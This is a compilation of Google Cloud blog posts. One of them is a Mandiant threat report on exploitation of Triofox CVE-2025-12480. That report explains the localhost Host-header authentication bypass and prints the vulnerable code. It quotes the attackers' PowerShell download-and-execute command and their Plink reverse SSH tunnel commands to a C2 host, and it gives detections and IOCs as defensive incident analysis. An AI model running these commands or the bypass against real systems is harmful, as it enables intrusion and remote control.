Migrating to Bigtable has delivered substantial, quantifiable benefits for Zeotap. Most notably, we achieved a 46% decrease in Total Cost of Ownership (TCO) compared to our previous infrastructure. This cost efficiency was paired with a 20% reduction in overall operational tasks and overhead — a direct result of the tight integration between Bigtable and BigQuery. Beyond resource savings, the platform now offers enhanced performance and reliability — with lower latencies — enabling us to confidently meet our stringent Service Level Agreement (SLA) commitments. Furthermore, Bigtable has improved our agility, allowing for faster deployment of AI/ML models across various environments with efficient resource utilization, such as reading batch workloads off our Disaster Recovery (DR) cluster.

Transform your data infrastructure with Bigtable

Zeotap’s migration is a compelling example of how choosing the right database can address the challenges of scale, performance, and operational complexity in the era of real-time data and AI. By leveraging Bigtable’s capabilities for high throughput, low-latency reads, and efficient handling of demanding workloads, coupled with its seamless integration with BigQuery, Zeotap built a more flexible, efficient, and cost-effective platform that empowers customers’ real-time data initiatives.

Learn more

Check out the power of Bigtable and begin planning your migration today.
Discover Bigtable’s Cassandra API and tools for no-downtime, no code-change migrations from ScyllaDB and Cassandra
Read more about new Bigtable features like SQL support, distributed counters, continuous materialized views, tiered storage and data boost.


2025 11 10

GCP – No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480

Tibor Kiss Cloud, Google Cloud gcp

Written by: Stallone D’Souza, Praveeth DSouza, Bill Glynn, Kevin O’Flynn, Yash Gupta

Welcome to the Frontline Bulletin Series

Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the threats we are seeing in the wild right now, equipping our community to understand and respond.

Introduction

Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an attacker to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads.

As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution.

The activity discussed in this blog post leveraged a vulnerability in Triofox version 16.4.10317.56372, which was mitigated in release 16.7.10368.56560.

Gladinet engaged with Mandiant on our findings, and Mandiant has validated that this vulnerability is resolved in new versions of Triofox.

Initial Detection

Mandiant leverages Google Security Operations (SecOps) for detecting, investigating, and responding to security incidents across our customer base. As part of Google Cloud Security’s Shared Fate model, SecOps provides out-of-the-box detection content designed to help customers identify threats to their enterprise. Mandiant uses SecOps’ composite detection functionality to enhance our detection posture by correlating the outputs from multiple rules.

For this investigation, Mandiant received a composite detection alert identifying potential threat actor activity on a customer’s Triofox server. The alert identified the deployment and use of remote access utilities (using PLINK to tunnel RDP externally) and file activity in potential staging directories (file downloads to C:\WINDOWS\Temp).

Within 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host. The investigation revealed an unauthenticated access vulnerability that allowed access to configuration pages. UNC6485 used these pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin, and used this account to conduct subsequent activities.

Triofox Unauthenticated Access Control Vulnerability

Figure 1: CVE-2025-12480 exploitation chain

During the Mandiant investigation, we identified an anomalous entry in the HTTP log file – a suspicious HTTP GET request with an HTTP Referer URL containing localhost. The presence of the localhost host header in a request originating from an external source is highly irregular and typically not expected in legitimate traffic.

GET /management/CommitPage.aspx - 443 - 85.239.63[.]37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.41+Safari/537.36 http://localhost/management/AdminAccount.aspx 302 0 0 56041

Figure 2: HTTP log entry
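A log review for this pattern can be sketched in a few lines. The example below is an illustration under stated assumptions: the field order is inferred from the single sample entry above rather than from a general IIS log specification, and `is_suspicious` is a hypothetical helper name.

```python
import ipaddress
from urllib.parse import urlparse

# Field order assumed from the sample entry in this post (not a general IIS layout).
FIELDS = ["method", "uri_stem", "uri_query", "port", "username", "client_ip",
          "user_agent", "referer", "status", "substatus", "win32_status", "time_taken"]


def is_suspicious(log_line: str) -> bool:
    """Flag requests with a localhost Referer that come from a non-loopback client."""
    values = log_line.split()
    if len(values) != len(FIELDS):
        return False  # layout differs from the assumed one; skip rather than guess
    entry = dict(zip(FIELDS, values))
    if urlparse(entry["referer"]).hostname != "localhost":
        return False
    try:
        # Undo the "[.]" defanging used in this post before parsing the address.
        client = ipaddress.ip_address(entry["client_ip"].replace("[.]", "."))
    except ValueError:
        return False
    return not client.is_loopback
```

A match is only a lead for further investigation; the check says nothing about whether the request succeeded.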

Within a test environment, Mandiant noted that standard HTTP requests issued to AdminAccount.aspx result in a redirect to the Access Denied page, indicative of access controls being in place on the page.

Figure 3: Redirection to AccessDenied.aspx when attempting to browse AdminAccount.aspx

Access to the AdminAccount.aspx page is granted as part of setup from the initial configuration page at AdminDatabase.aspx. The AdminDatabase.aspx page is automatically launched after first installing the Triofox software. This page allows the user to set up the Triofox instance, with options such as database selection (Postgres or MySQL), connecting LDAP accounts, or creating a new native cluster admin account, in addition to other details.

Attempts to browse to the AdminDatabase.aspx page resulted in a similar redirect to the Access Denied page.

Figure 4: Redirection to AccessDenied.aspx when attempting to browse AdminDatabase.aspx

Mandiant validated the vulnerability by testing the workflow of the setup process. The Host header field is provided by the web client and can be easily modified by an attacker. This technique is referred to as an HTTP host header attack. Changing the Host value to localhost grants access to the AdminDatabase.aspx page.

Figure 5: Access granted to AdminDatabase.aspx by changing Host header to localhost

By following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the admin initialization page, AdminAccount.aspx, which then redirects to the InitAccount.aspx page to create a new admin account.

Figure 6: Successful access to the AdminCreation page InitAccount.aspx

Analysis of the code base revealed that the main access control check to the AdminDatabase.aspx page is controlled by the function CanRunCriticalPage(), located within the GladPageUILib.GladBasePage class found in C:\Program Files (x86)\Triofox\portal\bin\GladPageUILib.dll.

public bool CanRunCriticalPage()
{
    Uri url = base.Request.Url;
    string host = url.Host;
    bool flag = string.Compare(host, "localhost", true) == 0; //Access to the page is granted if Request.Url.Host equals 'localhost', immediately skipping all other checks if true

    bool result;
    if (flag)
    {
        result = true;
    }
    else
    {
        // Check for a pre-configured trusted IP in the web.config file. If configured, compare the client IP with the trusted IP to grant access
        string text = ConfigurationManager.AppSettings["TrustedHostIp"];
        bool flag2 = string.IsNullOrEmpty(text);
        if (flag2)
        {
            result = false;
        }
        else
        {
            string ipaddress = this.GetIPAddress();
            bool flag3 = string.IsNullOrEmpty(ipaddress);
            if (flag3)
            {
                result = false;
            }
            else
            ...

Figure 8: Vulnerable code in the function CanRunCriticalPage()

As noted in the code snippet, the code presents several vulnerabilities:

Host Header attack – ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an attacker.
No Origin Validation – No check for whether the request came from an actual localhost connection versus a spoofed header.
Configuration Dependence – If TrustedHostIp isn’t configured, the only protection is the Host header check.
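The difference between trusting the Host header and validating the connection origin can be shown with a small Python analogy. This is a sketch only: both function names are hypothetical, and it does not represent the fix Gladinet shipped.

```python
import ipaddress


def vulnerable_is_local(host_header: str) -> bool:
    """Mirrors the flawed logic: trusts the client-supplied Host header."""
    hostname = host_header.split(":")[0]
    return hostname.lower() == "localhost"


def safer_is_local(peer_address: str) -> bool:
    """Trusts only the socket peer address, which request headers cannot change."""
    try:
        return ipaddress.ip_address(peer_address).is_loopback
    except ValueError:
        return False
```

An external client that sends `Host: localhost` passes the first check but fails the second, because its peer address is not a loopback address. Behind a reverse proxy the peer address is the proxy’s, so a real deployment would need to account for that.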

Triofox Anti-Virus Feature Abuse

To achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious files to execute them using the built-in anti-virus feature. To set up the anti-virus feature, the user is allowed to provide an arbitrary path for the selected anti-virus. The file configured as the anti-virus scanner location inherits the Triofox parent process account privileges, running under the context of the SYSTEM account.

The attacker was able to run their malicious batch script by configuring the path of the anti-virus engine to point to their script. The folder path on disk of any shared folder is displayed when publishing a new share within the Triofox application. Then, by uploading an arbitrary file to any published share within the Triofox instance, the configured script will be executed.

Figure 9: Anti-virus engine path set to a malicious batch script

SecOps telemetry recorded the following command-line execution of the attacker script:

C:\Windows\system32\cmd.exe /c ""c:\triofox\centre_report.bat" C:\Windows\TEMP\eset_temp\ESET638946159761752413.av"

Post-Exploitation Activity

Support Tools Deployment

The attacker script centre_report.bat executed the following PowerShell command to download and execute a second-stage payload:

powershell -NoProfile -ExecutionPolicy Bypass -Command "$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip'; $out = 'C:\\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe'; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList '/silent' -Wait"

The PowerShell downloader was designed to:

Download a payload from http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip, which hosted a disguised executable despite the ZIP extension
Save the payload to: C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe
Execute the payload silently

The executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer. The attacker used the UEMS agent to then deploy the Zoho Assist and Anydesk remote access utilities on the host.

Reconnaissance and Privilege Escalation

The attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain user information.

Additionally, they attempted to change passwords for existing accounts and add the accounts to the local administrators and the “Domain Admins” group.

Defense Evasion

The attacker downloaded sihosts.exe and silcon.exe (sourced from the legitimate domain the.earth[.]li) into the directory C:\windows\temp.

Filename	Original Filename	Description
sihosts.exe	Plink (PuTTY Link)	A common command-line utility for creating SSH connections
silcon.exe	PuTTY	An SSH and telnet client

These tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2 or C&C) server over port 433 via SSH. The C2 server could then forward all traffic over the tunnel to the compromised host on port 3389, allowing inbound RDP traffic. The commands were run with the following parameters:

C:\windows\temp\sihosts.exe -batch -hostkey "ssh-rsa 2048 SHA256:<REDACTED>" -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46

C:\windows\temp\silcon.exe -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46
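The `-R` argument in these commands follows the PuTTY/Plink remote-forwarding form `[listen-IP:]listen-port:host:port`. A minimal sketch of parsing that value and flagging tunnels that expose RDP might look like the following; the helper names are hypothetical, and the parser only handles IPv4-style values such as the ones shown here.

```python
from typing import NamedTuple, Optional


class RemoteForward(NamedTuple):
    listen_host: Optional[str]
    listen_port: int
    target_host: str
    target_port: int


def parse_remote_forward(spec: str) -> RemoteForward:
    """Parse an IPv4-style `-R [listen-host:]listen-port:host:port` value."""
    # Undo the "[.]" defanging used in this post before splitting on colons.
    parts = spec.replace("[.]", ".").split(":")
    if len(parts) == 3:
        parts = [None, *parts]  # no explicit listen host was given
    if len(parts) != 4:
        raise ValueError(f"unexpected forward spec: {spec!r}")
    listen_host, listen_port, target_host, target_port = parts
    return RemoteForward(listen_host, int(listen_port), target_host, int(target_port))


def exposes_rdp(spec: str) -> bool:
    """True when the tunnel forwards to the default RDP port, 3389."""
    return parse_remote_forward(spec).target_port == 3389
```

Applied to the value above, the parser yields a listener on port 17400 of the C2 host that forwards to 127.0.0.1:3389 on the compromised machine.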

Conclusion

While this vulnerability is patched in the Triofox version 16.7.10368.56560, Mandiant recommends upgrading to the latest release. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not configured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using our hunting queries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic.

Acknowledgements

Special thanks to Elvis Miezitis, Chris Pickett, Moritz Raabe, Angelo Del Rosario, and Lampros Noutsos

Detection Through Google SecOps

Google SecOps customers have access to these broad category rules and more under the Mandiant Windows Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Gladinet or Triofox IIS Worker Spawns CMD
Gladinet or Triofox Suspicious File or Directory Activity
Gladinet Cloudmonitor Launches Suspicious Child Process
Powershell Download and Execute
File Writes To AppCompat
Suspicious Renamed Anydesk Install
Suspicious Activity In Triofox Directory
Suspicious Execution From Appcompat
RDP Protocol Over SSH Reverse Tunnel Methodology
Plink EXE Tunneler
Net User Domain Enumeration

SecOps Hunting Queries

The following UDM queries can be used to identify potential compromises within your environment.

GladinetCloudMonitor.exe Spawns Windows Command Shell

Identify the legitimate GladinetCloudMonitor.exe process spawning a Windows Command Shell.

metadata.event_type = "PROCESS_LAUNCH"
principal.process.file.full_path = /GladinetCloudMonitor.exe/ nocase
target.process.file.full_path = /cmd.exe/ nocase

Utility Execution

Identify the execution of a renamed Plink executable (sihosts.exe) or a renamed PuTTY executable (silcon.exe) attempting to establish a reverse SSH tunnel.

metadata.event_type = "PROCESS_LAUNCH"
target.process.command_line = /-R\b/
(
target.process.file.full_path = /(silcon.exe|sihosts.exe)/ nocase or
(target.process.file.sha256 = "50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7" and target.process.file.full_path != /plink.exe/ nocase) or
(target.process.file.sha256 = "16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad" and target.process.file.full_path != /putty.exe/ nocase)
)

Indicators of Compromise (IOCs)

The following IOCs are available in a Google Threat Intelligence (GTI) collection for registered users.

Note: The following table contains artifacts that are renamed instances of legitimate tools.

Host-Based Artifacts

Artifact	Description	SHA-256 Hash
C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe	Installer containing Zoho UEMS Agent	`43c455274d41e58132be7f66139566a941190ceba46082eb2ad7a6a261bfd63f`
C:\Windows\temp\sihosts.exe	Plink	`50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7`
C:\Windows\temp\silcon.exe	PuTTY	`16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad`
C:\Windows\temp\file.exe	AnyDesk	`ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7c6a9a4eace2f`
C:\triofox\centre_report.bat	Attacker batch script filename	N/A
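For teams without a tool that ingests these hashes directly, a file can be checked against the table with the Python standard library. This is a minimal sketch: `sha256_of` and `match_ioc` are hypothetical helper names, and the hash values are copied from the table above.

```python
import hashlib
from pathlib import Path
from typing import Optional

# SHA-256 values copied from the host-based artifacts table in this post.
IOC_SHA256 = {
    "43c455274d41e58132be7f66139566a941190ceba46082eb2ad7a6a261bfd63f": "Zoho UEMS Agent installer",
    "50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7": "Plink",
    "16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad": "PuTTY",
    "ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7c6a9a4eace2f": "AnyDesk",
}


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries are not loaded into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_ioc(path: Path) -> Optional[str]:
    """Return the artifact description if the file's hash is listed, else None."""
    return IOC_SHA256.get(sha256_of(path))
```

Because these artifacts are renamed copies of legitimate tools, a hash match is most meaningful when the file name or location is also unexpected.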

Network-Based Artifacts

IP Address	ASN	Description
`85.239.63[.]37`	`AS62240 - Clouvider Limited`	IP address of the attacker used to initially exploit CVE-2025-12480 to create the admin account and gain access to the Triofox instance
`65.109.204[.]197`	`AS24950 - Hetzner Online GmbH`	After a dormant period, the threat actor used this IP address to log back in to the Triofox instance and carry out subsequent activities
`84.200.80[.]252`	`AS214036 - Ultahost, Inc.`	IP address hosting the installer for the Zoho UEMSAgent remote access tool
`216.107.136[.]46`	`AS396356 - LATITUDE-SH`	Plink C2


2025 11 07

GCP – How Ericsson achieves data integrity and superior governance with Dataplex

Tibor Kiss Cloud, Google Cloud gcp

Data is the engine of modern telecommunications. For Ericsson’s Managed Services, which operates a global network of more than 710,000 sites, harnessing this data is not just an advantage, it’s essential for business growth and leadership. To power the future of its autonomous network operations and deliver on its strategic priorities, Ericsson has been on a transformative data journey with governance at the center of its strategy.

Ericsson moved from foundational practices to a sophisticated, business-enabling data governance framework using Google Cloud’s Dataplex Universal Catalog, turning data from a simple resource into a strategic asset.

From a new operating model to a new data mindset

Ericsson’s journey began in 2019 with the launch of the Ericsson Operations Engine (EOE), a groundbreaking, AI-powered operating model for managing complex, multi-vendor telecom networks. The EOE made one thing clear: to succeed, data had to be at the core of everything.

This realization led Ericsson to develop its first enterprise data strategy, which established the core principles for how data is collected, managed and governed. However, building a strategy is one thing — operationalizing it at scale is another.

To move beyond theory to address real-world challenges, Ericsson needed to:

Build trust: Provide discoverable, clean, reliable, and well-understood data to the teams deploying analytics, AI, and automation.
Balance defense and offense: Ensure compliance with contracts and regulations (defensive governance) while empowering teams to innovate and create value from data (offensive governance).
Ensure data integrity: Ericsson users see data integrity as the core principle for effective data management. Data quality, which is essential for reliable, trustworthy data throughout its lifecycle, is a key quality indicator (KQI) for measuring effectiveness. Any quality deviations must be managed like a high-priority incident with clear Service Level Agreements (SLA) for restoration and resolution.

To realize this vision, Ericsson sought a platform that could match its ambition for global-scale governance and innovation — and Dataplex Universal Catalog emerged as the ideal choice.

Ericsson made its selection based on four key criteria.

First, its capabilities aligned perfectly with Ericsson’s requirements for cloud-native transformation, business principles, and a long-term governance vision, underpinned by Ericsson’s strategic partnership with Google Cloud. Second, from a technical standpoint, Dataplex provided a tightly integrated, end-to-end ecosystem as a native Google Cloud solution, translating to faster time-to-market for use cases and reduced integration overhead.

Third, the platform offered a practical operating model that enabled quick learning, adaptation, and self-sufficiency, supporting an agile approach where Ericsson could fail fast and iterate. Finally, because Ericsson was already a Google Cloud customer, Dataplex served as a natural extension of its existing environment, adding governance capabilities with a clear and manageable Total Cost of Ownership (TCO) for both storage and compute.

Putting governance into practice: Key capabilities in action

With Dataplex Universal Catalog as the governance foundation, Ericsson began implementing the core pillars of its governance program, moving from manual processes to an automated, intelligent data fabric.

More specifically, Ericsson established a unified business vocabulary within Dataplex. This transformative first step eliminated ambiguity and ensured their teams — from data scientists to data analysts — were speaking the same language. These glossaries also captured tribal knowledge and became the foundation for creating trusted data products.

In addition, Dataplex’s catalog is at the heart of the data governance solution, making data discovery simple and intuitive for authorized users. Ericsson uses its tagging capabilities to enrich the data assets with critical metadata, including data classification, ownership, retention policies, and sensitivity labels. Dataplex’s ability to automatically visualize data lineage, down to the column level, is another game-changer. Different data personas can instantly understand a dataset’s origin and its downstream impact, dramatically increasing trust and reducing investigation time. Furthermore, trustworthy AI models are built on high-quality data. For proactive data quality, Ericsson uses Dataplex to run automated quality checks and profiles on its data pipelines. When a quality rule is breached, an alert is automatically triggered, creating an incident in its service management platform to ensure data issues are treated with the urgency they deserve.
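The quality-check-to-incident flow described above can be sketched generically. The example below does not use the Dataplex API; `QualityRule`, `evaluate`, and `run_checks` are hypothetical names, and the returned dictionaries stand in for tickets in a service management platform.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class QualityRule:
    name: str
    column: str
    check: Callable[[object], bool]  # returns True when a value passes
    min_pass_ratio: float            # breach when the pass ratio falls below this


def evaluate(rule: QualityRule, rows: list[dict]) -> float:
    """Return the fraction of rows whose column value passes the rule."""
    if not rows:
        return 1.0
    passed = sum(1 for row in rows if rule.check(row.get(rule.column)))
    return passed / len(rows)


def run_checks(rules: list[QualityRule], rows: list[dict]) -> list[dict]:
    """Return one incident record per breached rule (a stand-in for a ticket)."""
    incidents = []
    for rule in rules:
        ratio = evaluate(rule, rows)
        if ratio < rule.min_pass_ratio:
            incidents.append({"rule": rule.name, "pass_ratio": ratio, "priority": "high"})
    return incidents
```

Treating each breach as a high-priority record mirrors the principle that quality deviations are handled like incidents with defined SLAs.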

These capabilities are all underpinned by Ericsson’s Data Operating Model (DOM), a framework that defines the policies, people, processes, and technology needed to translate its data strategy into tangible value. It comprises several facets of working with data:

Enterprise data architecture: Managing data flow, enterprise data modeling, and best practices from data collection through consumption
Technology and tools: Business glossary, master, reference and metadata management, data modeling, and data quality management
Roles and responsibilities: Roles to manage and govern data (i.e., end-to-end data lifecycle and stewardship)
Data and model assurance: Data pipelines monitoring, data observability, and data quality monitoring
Governance: Data compliance, risk and security management, operational level agreements, objectives and key results, and audit management
Processes: Data governance, data quality, data management, and data consent related processes

Looking ahead: The future is integrated and intelligent

As a global technology leader, Ericsson is committed to shaping the future of AI-powered data governance. Technology, especially in the AI space, is evolving at a breathtaking pace, and both data and AI governance practices must keep up.

These developments are guiding Ericsson’s future priorities, which include bridging the gap between data and AI governance, especially with the rise of generative and agentic AI. These plans include evaluating generative AI capabilities in BigQuery and Dataplex to simplify governance, and pursuing solutions that ensure transparency, explainability, and fairness and that manage risk in the deployment of AI models.

In addition to harnessing the power of AI for at-scale governance, Ericsson plans to adopt governance workflows, glossary-driven data quality policies, at-scale assignment of terms to assets, bulk import and export of glossaries, AI-powered glossary recommendations, and data quality re-usability functionalities. Ericsson is also aligning its architecture with data fabric and data mesh principles, empowering teams with self-service access to high-quality, trusted data products. Finally, Ericsson will be assessing the use of more granular, policy-based access controls to complement existing role-based access, further strengthening its data security, protection and privacy.

For any organization embarking on a similar path, Ericsson’s experience offers several key lessons:

Governance is a value enabler, not a blocker: A modern data governance program is focused on business enablement first, driving value and innovation, to complement policies, rules and risk management.
It’s a journey, not a destination: Be prepared to fail fast, learn, and adapt. The landscape is constantly changing at breakneck speed.
Focus on business outcomes, not tools: Technology is a critical enabler, but the conversation is about the business value you’re creating. Simplify the story, speak the language of the business, and unpack the hype.
Culture is everything: For governance to be effective, it’s the responsibility of everyone. This requires strong leadership, sponsorship, and a “data-first” mindset embedded throughout the organization.

By partnering with Google Cloud and tapping into the power of Dataplex Universal Catalog, Ericsson is building a data foundation that is not only compliant and secure but agile and intelligent — ready to power the next generation of autonomous networks.


2025 11 07

GCP – ADK architecture: When to use sub-agents versus agents as tools

Tibor Kiss Cloud, Google Cloud gcp

At its simplest, an agent is an application that reasons on how to best achieve a goal based on inputs and tools at its disposal.

As you build sophisticated multi-agent AI systems with the Agent Development Kit (ADK), a key architectural decision involves choosing between a sub-agent and an agent as a tool. This choice fundamentally impacts your system’s design, how well it scales, and its efficiency. Choosing the wrong pattern can lead to massive overhead — either by constantly passing full conversational history to a simple function or by under-utilizing the context-sharing capabilities of a more complex system.

While both sub-agents and tools help break down complex problems, they serve different purposes. The key difference is how they handle control and context.

Agents as tools: The specialist on call

An agent as a tool is a self-contained expert agent packaged for a specific, discrete task, like a specialized function call. The main agent calls the tool with a clear input and gets a direct output, operating like a transactional API. The main agent doesn’t need to worry about how the tool works; it only needs a reliable result. This pattern is ideal for independent and reusable tasks.

Key characteristics:

Encapsulated and reusable: The internal logic is hidden, making the tool easy to reuse across different agents.
Isolated context: The tool runs in its own session and cannot access the calling agent’s conversation history or state.
Stateless: The interaction is stateless. The tool receives all the information it needs in a single request.
Strict input/output: It operates based on a well-defined contract.

Sub-agents: The delegated team member

A sub-agent is a delegated team member that handles a complex, multi-step process. This is a hierarchical and collaborative relationship where the sub-agent works within the broader context of the parent agent’s mission. Use sub-agents for tasks that require a chain of reasoning or a series of interactions.

Key characteristics:

Tightly coupled and integrated: Sub-agents are part of a larger, defined workflow.
Shared context: They operate within the same session and can access the parent’s conversation history and state, allowing for more nuanced collaboration.
Stateful processes: They are ideal for managing processes where the task requires several steps to complete.
Hierarchical delegation: The parent agent explicitly delegates a high-level task and lets the sub-agent manage the process.
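The contrast in context handling between the two patterns can be illustrated in plain Python. This sketch deliberately does not use the ADK API; `Session`, `currency_tool`, and `hotel_sub_agent` are hypothetical names chosen only to show isolated versus shared context.

```python
from dataclasses import dataclass, field


@dataclass
class Session:
    """Stand-in for a parent agent's conversation history and state."""
    history: list[str] = field(default_factory=list)
    state: dict[str, str] = field(default_factory=dict)


def currency_tool(amount: float, rate: float) -> float:
    """Agent-as-tool style: everything arrives in the call; no session access."""
    return round(amount * rate, 2)


def hotel_sub_agent(session: Session) -> str:
    """Sub-agent style: reads and updates the parent's shared session."""
    city = session.state.get("destination", "unknown")
    session.history.append(f"hotel_sub_agent: searching hotels in {city}")
    session.state["hotel_status"] = "options_presented"
    return f"Here are hotel options in {city}."
```

The tool’s result depends only on its arguments, so it can be reused anywhere. The sub-agent’s behavior depends on, and changes, the shared session, which is what makes multi-step collaboration possible.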

Here is a simple decision matrix that you can use to guide your architectural decision based on the task:

Criterion	Agent as a tool	Sub-agent	Decision
Task complexity	Low to Medium	High	Use a tool for atomic functions. Use a sub-agent for complex workflows.
Context & state	Isolated/None	Shared	If the task is stateless, use a tool. If it requires conversational context, use a sub-agent.
Reusability	High	Low to Medium	For generic, widely applicable capabilities, build a tool. For specialized roles in a specific process, use a sub-agent.
Autonomy & control	Low	High	Use a tool for a simple request-response. Use a sub-agent for delegating a whole sub-problem.
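One way to apply the matrix consistently is to encode it as a small function. The sketch below is an assumption-laden illustration: `TaskProfile` and `choose_pattern` are hypothetical, and the rule of treating shared context as decisive and taking a majority vote on the remaining criteria is one possible reading of the matrix, not part of ADK.

```python
from dataclasses import dataclass


@dataclass
class TaskProfile:
    complex_workflow: bool      # multi-step reasoning rather than an atomic function
    needs_shared_context: bool  # must see the parent's conversation history or state
    widely_reusable: bool       # generic capability useful to many agents
    delegates_subproblem: bool  # owns a whole sub-problem, not one request-response


def choose_pattern(task: TaskProfile) -> str:
    """Return "sub-agent" or "tool" for a task, following the matrix above."""
    # A tool runs in an isolated session, so shared context forces a sub-agent.
    if task.needs_shared_context:
        return "sub-agent"
    sub_agent_votes = sum([task.complex_workflow, task.delegates_subproblem,
                           not task.widely_reusable])
    return "sub-agent" if sub_agent_votes >= 2 else "tool"
```

A stateless, reusable conversion function scores zero votes and comes out as a tool, while a specialized multi-step workflow comes out as a sub-agent.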

Use cases in action

Let’s apply this framework to some real-world scenarios.

Use case 1: The data agent (NL2SQL and visualization)

A business user asks for the top 5 product sales in Q2 by region and wants a bar chart.

Root Agent: Receives the business user’s natural-language (NL) request, determines the necessary steps (SQL generation → Execution → Visualization), and delegates and sequences the tasks before returning the response to the user.
NL2SQL Agent: Use a tool. The task is a single, reusable function: convert natural language to a SQL string, using metadata & schema for grounding.
Database Executor: Use a tool. This is a simple, deterministic function to execute the query and return data.
Data Visualization Agent: Use a sub-agent. The task is complex and multi-step. It involves analyzing the data returned by the database tool, and the original user query, selecting the right chart type, generating the visualization code, and executing it. Delegating this to a sub-agent allows the main orchestrator agent to maintain a high-level view while the sub-agent independently manages its complex internal workflow.

Use case 2: The sophisticated travel planner

A user asks to plan a 5-day anniversary trip to Paris, with specific preferences for flights, hotels, and activities. This is an ambiguous, high-level goal that requires continuous context and planning.

Travel planner: Use a root agent to maintain the overall goal (“5-day anniversary trip to Paris”), manage the flow between sub-agents, and aggregate the final itinerary.

Note: You could implement a Context/Memory Manager Tool accessible to all agents, potentially using a simple key-value store (like Redis or a simple database) to delegate the storage of immutable decisions.

Flight search: Use a sub-agent. The task is not a simple search; it involves multiple back-and-forth interactions with the user (e.g., “Is a layover in Dubai okay?”) while managing the overall trip context (dates, destination, class).
Hotel booking: Use a sub-agent. It needs to maintain state and context (dates, location preference, 5-star rating) as it searches for and presents options.
Itinerary generation: Use a sub-agent to generate a logical, day-by-day itinerary. The agent must combine confirmed flights/hotels with user interests (e.g., art museums, fine dining), potentially using its own booking tools.

Using tools here would be inefficient: each call would need the full trip context passed in, leading to redundancy and a risk of state loss. Sub-agents are better for these stateful, collaborative processes because they share session context.

Get started

The decision between sub-agents and agents as tools is fundamental to designing an effective and scalable agentic system in ADK. As a guiding principle, remember:

Use tools for discrete, stateless, and reusable capabilities.
Use sub-agents to manage complex, stateful, and context-dependent processes.

By mastering this architectural pattern, you can design multi-agent systems that are modular and capable of solving complex, real-world problems.

Check out these examples on GitHub to start building using ADK.
Here is a fantastic blogpost that will help you build your first multi-agent workflow.

Read More for the details.

2025 11 07

GCP – AlloyDB accelerates AI with automated vector indexing and embedding

Tibor Kiss Cloud, Google Cloud gcp

Modern applications store their most valuable data such as product catalogs or user profiles in operational databases. These data stores are excellent for applications that need to handle real-time transactions — and with their support for vector operations, they’ve also become an excellent foundation for modern search or gen AI application serving.

AlloyDB AI provides powerful, high-performance vector capabilities, enabling you to generate embeddings inline and manually tune powerful vector indexes. While you can generate embeddings out of the box for inline search use cases, we also wanted AlloyDB to address the complexity of creating and maintaining huge numbers of vector embeddings.

To make this possible, we’re introducing two new features for AlloyDB AI, available in preview, that will empower you to transform your existing operational database into a powerful, AI-native database with just a few lines of SQL:

Auto vector embeddings
Auto vector index

Auto vector embeddings transform operational data into vector-search-ready data by vectorizing data stored inside AlloyDB at scale. The auto vector index self-configures vector indexes optimized for your workload, ensuring high quality and performance.

Compare this to the traditional approach of creating the vectors and loading them into your database. The basic steps are familiar to any AI developer: generate vector embeddings using specialized AI models, import the vectors into the database alongside the underlying text, and tune vector indexes. In practice, that means building an ETL (Extract, Transform, Load) pipeline: extract the data from your database, apply transformations, run it through the AI model, reformat the output, reinsert it into your database, and then tune the vector indexes. This approach not only involves significant engineering complexity but also introduces latency, making it difficult to keep the embeddings in sync with your live data even though they are stored alongside it.

An additional challenge is to keep the vector index up to date, which is hard to do manually. While manually tuned indexes are performant and provide excellent results, they can be sensitive to updates in the underlying data and require performance and quality testing before they’re ready to hit the road.

Let’s walk through an example journey of an operational workload and see how AlloyDB AI’s new features remove friction from building enterprise-grade AI, and enable users to modernize applications from their database.

AlloyDB as a vector database

Imagine you run a large e-commerce platform with a products table in AlloyDB, containing structured data like product_id, color, price, and inventory_count, alongside unstructured data such as product_description.

